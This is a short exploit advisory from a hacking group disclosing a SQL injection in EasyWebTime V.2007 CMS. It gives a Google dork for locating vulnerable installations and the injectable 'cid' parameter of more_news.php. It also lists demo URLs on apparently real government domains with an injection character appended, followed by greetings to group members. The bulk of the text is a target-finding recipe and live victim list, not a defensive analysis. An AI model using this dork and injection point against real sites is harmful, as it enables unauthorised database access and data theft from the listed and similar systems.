############################################################################ # Exploit Title: EasyWebTime V.2007 CMS sql injection # Google Dork: "Powered by EasyWebTime V.2007" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.bizpotential.com/main.php?filename=easywebtime # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ ================================== sqli [+] more_news.php?cid=[id][sqli]&filename=[filename] D3m0: http://www.cad.go.th/cadweb_org/more_news.php?cid=1182%27&filename=index http://nakhonphanom.cad.go.th/more_news.php?cid=1%27&filename=index2 http://region1.cad.go.th/more_news.php?cid=1'&filename=index2011 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369